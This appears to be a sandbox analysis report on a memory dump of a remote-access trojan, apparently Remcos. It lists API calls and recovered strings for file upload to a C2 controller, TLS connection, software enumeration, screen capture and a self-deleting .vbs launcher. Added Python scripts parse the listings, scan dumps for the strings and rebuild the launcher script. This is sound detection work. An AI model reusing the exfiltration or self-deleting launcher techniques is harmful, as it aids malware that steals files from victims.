                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                              • _wcslen.LIBCMT ref: 0041C1CC
                                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                              • GetLastError.KERNEL32 ref: 0041C204
                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                              • GetLastError.KERNEL32 ref: 0041C261
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                              • String ID: ?
                                                              • API String ID: 3941738427-1684325040
                                                              • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                              • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                              • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                              • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                              • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                              • API String ID: 2490988753-3346362794
                                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                              • String ID:
                                                              • API String ID: 3899193279-0
                                                              • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                              • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                              • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                              • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                              • String ID: /stext "$0TG$0TG$NG$NG
                                                              • API String ID: 1223786279-2576077980
                                                              • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                              • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                              • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                              • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
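The per-function "APIs" listings in this report follow a fixed line shape (direct calls, calls marked as part of a subcall function, and calls with no argument list such as `ExitProcess.KERNEL32 ref: 0041D6F6`). The following Python is an added triage helper, not code from Joe Sandbox or from the sample: it parses such listings into records and flags the call combinations that matter in this report (file read plus `send`, registry enumeration, sleep-then-delete, ShellExecute-then-exit). The line grammar is inferred from the listings on this page, and the sample listing is copied from the upload routine below (function at 00408D1E onward); any other report format is an assumption.

```python
"""Parse a Joe Sandbox per-function API listing and flag call patterns.

Added example for this report; line format inferred from the listings here.
"""
import re

# One listing line.  Three shapes occur on this page:
#   • CreateFileW.KERNEL32(00000000,80000000,...), ref: 00408D1E
#   • Part of subcall function 00404AA1: send.WS2_32(?,00000000,...), ref: 00404B36
#   • ExitProcess.KERNEL32 ref: 0041D6F6          (no argument list at all)
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_listing(text):
    """Return one dict per API line; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args is not None else [],
            "ref": int(m.group("ref"), 16),
            # address of the callee when the line is "Part of subcall function"
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


# API groups used by the flags below; only names that occur on this page.
FILE_READ = {"CreateFileW", "ReadFile", "GetFileSizeEx", "GetFileSize", "SetFilePointerEx"}
NETWORK = {"send", "connect"}
REG_ENUM = {"RegOpenKeyExA", "RegEnumKeyExA"}


def flag_function(calls):
    """Flags for one function's calls, subcalls included (they still execute)."""
    apis = {c["api"] for c in calls}
    flags = []
    if apis & FILE_READ and apis & NETWORK:
        flags.append("reads a file and sends on a socket: candidate upload/exfil routine")
    if REG_ENUM <= apis:
        flags.append("enumerates a registry key: host/software reconnaissance")
    if "DeleteFileW" in apis and "Sleep" in apis:
        flags.append("sleeps then deletes files: cleanup of dropped artefacts")
    if "ShellExecuteW" in apis and "ExitProcess" in apis:
        flags.append("launches via ShellExecute then exits: hand-off/respawn")
    return flags


# Constructed sample: the listing of the upload routine on this page.
SAMPLE = """\
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
• GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
"""

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        where = f" (via {c['subcall']:08X})" if c["subcall"] else ""
        print(f"{c['ref']:08X}: {c['api']}.{c['module']}{where} args={len(c['args'])}")
    for f in flag_function(parsed):
        print("FLAG:", f)
```

Subcall lines are kept in the same record set on purpose: `send` here is reached through function 00404AA1, and a triage rule that only looks at direct calls would miss that the file read and the socket write belong to one routine.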
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                              • API String ID: 1332880857-3714951968
                                                              • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                              • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                              • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                              • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                              • String ID: Close
                                                              • API String ID: 1657328048-3535843008
                                                              • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                              • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                              • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                              • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                              • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                              • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                              • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                              • __aulldiv.LIBCMT ref: 00408D88
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                              • API String ID: 3086580692-2582957567
                                                              • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                              • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                              • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                              • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                              APIs
                                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                              • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                              • API String ID: 3795512280-1152054767
                                                              • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                              • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                              • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                              • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                              APIs
                                                              • connect.WS2_32(?,?,?), ref: 004048E0
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                              • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                              • API String ID: 994465650-3229884001
                                                              • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                              • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                              • _free.LIBCMT ref: 0045137F
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 004513A1
                                                              • _free.LIBCMT ref: 004513B6
                                                              • _free.LIBCMT ref: 004513C1
                                                              • _free.LIBCMT ref: 004513E3
                                                              • _free.LIBCMT ref: 004513F6
                                                              • _free.LIBCMT ref: 00451404
                                                              • _free.LIBCMT ref: 0045140F
                                                              • _free.LIBCMT ref: 00451447
                                                              • _free.LIBCMT ref: 0045144E
                                                              • _free.LIBCMT ref: 0045146B
                                                              • _free.LIBCMT ref: 00451483
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                              • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                              • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                              • API String ID: 489098229-1431523004
                                                              • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                              • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                              • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                              • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                              • API String ID: 1913171305-3159800282
                                                              • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                              • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                              • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                              • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
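The strings in the blocks above (the `/stext "` helper command line whose output is sent and then deleted, `Uploading file to Controller: `, the `TLS Handshake... |` connect routine, the Uninstall-key enumeration, the `time_`/`wnd_` capture names, and the `.vbs` fragments that build a self-deleting launcher) are plaintext in the unpacked image dumped from process 15 at 00400000, not in the packed .NET sample on disk, so they are worth scanning for in memory dumps rather than in the original file. The following Python is an added example, not Joe Sandbox or Remcos code: it scans a dump for exactly those strings, and it recognises the launcher script the `.vbs` fragments describe. The assembly order of the fragments into one script (`Run "cmd /c ""<path>""", 0` followed by the `DeleteFile(Wscript.ScriptFullName)` line) is an assumption from the fragments, and the dump and path used for the demo are constructed.

```python
"""Scan a memory dump for the Remcos strings listed in this report and
recognise the self-deleting .vbs launcher.  Added example; dump constructed."""
import re

# Indicator bytes -> what the function containing them does on this page.
INDICATORS = {
    b'/stext "': "helper run with /stext; its text output is sent then deleted",
    b"Uploading file to Controller: ": "file upload to the C2 (CreateFileW/ReadFile then send)",
    b"TLS Handshake... |": "TLS-wrapped C2 connect routine",
    b"TLS Authentication Failed": "TLS-wrapped C2 connect routine",
    b"Connection Refused": "C2 connect error path",
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall":
        "installed-software enumeration via RegEnumKeyExA",
    b"time_%04i%02i%02i_%02i%02i%02i": "timestamped capture names (GDI+ routine)",
    b"wnd_%04i%02i%02i_%02i%02i%02i": "timestamped capture names (GDI+ routine)",
    b'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)':
        "self-deleting .vbs launcher written to %Temp%",
}


def scan_dump(data: bytes):
    """Return {indicator_text: [offsets]} for every indicator found in data."""
    hits = {}
    for needle in INDICATORS:
        offs = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offs:
            hits[needle.decode("latin-1")] = offs
    return hits


def summarize(hits):
    """Sorted, de-duplicated behaviours implied by the hits."""
    return sorted({INDICATORS[k.encode("latin-1")] for k in hits})


# Launcher shape assumed from the fragments: Run "cmd /c ""<path>""", 0
# on one line, the self-delete on the next.
VBS_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run "cmd /c ""(?P<cmd>.*?)""", 0\s*'
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(Wscript\.ScriptFullName\)',
    re.S,
)


def build_launcher_vbs(exepath: str) -> str:
    """Assemble the launcher the way the fragments suggest (assumed order)."""
    return (f'CreateObject("WScript.Shell").Run "cmd /c ""{exepath}""", 0\r\n'
            'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n')


def launched_command(vbs_text: str):
    """Command a self-deleting launcher would run, or None if not that shape."""
    m = VBS_RE.search(vbs_text)
    return m.group("cmd") if m else None


# Constructed dump: NUL-separated strings plus a launcher with a hypothetical path.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Uploading file to Controller: \x00"
    + b"TLS Handshake... |\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\x00"
    + b"wnd_%04i%02i%02i_%02i%02i%02i\x00"
    + build_launcher_vbs(r"C:\Temp\dropped.exe").encode()
    + b"\x00" * 16
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for text, offs in found.items():
        print(f"{offs[0]:08x}  {text!r}")
    for line in summarize(found):
        print("->", line)
    print("launcher runs:", launched_command(SAMPLE_DUMP.decode("latin-1")))
```

Run it against a process dump (for example the 0000000F.00000002 region referenced in each block) rather than the submitted sample; the on-disk MSIL file carries none of these strings until the payload is unpacked and injected.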
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
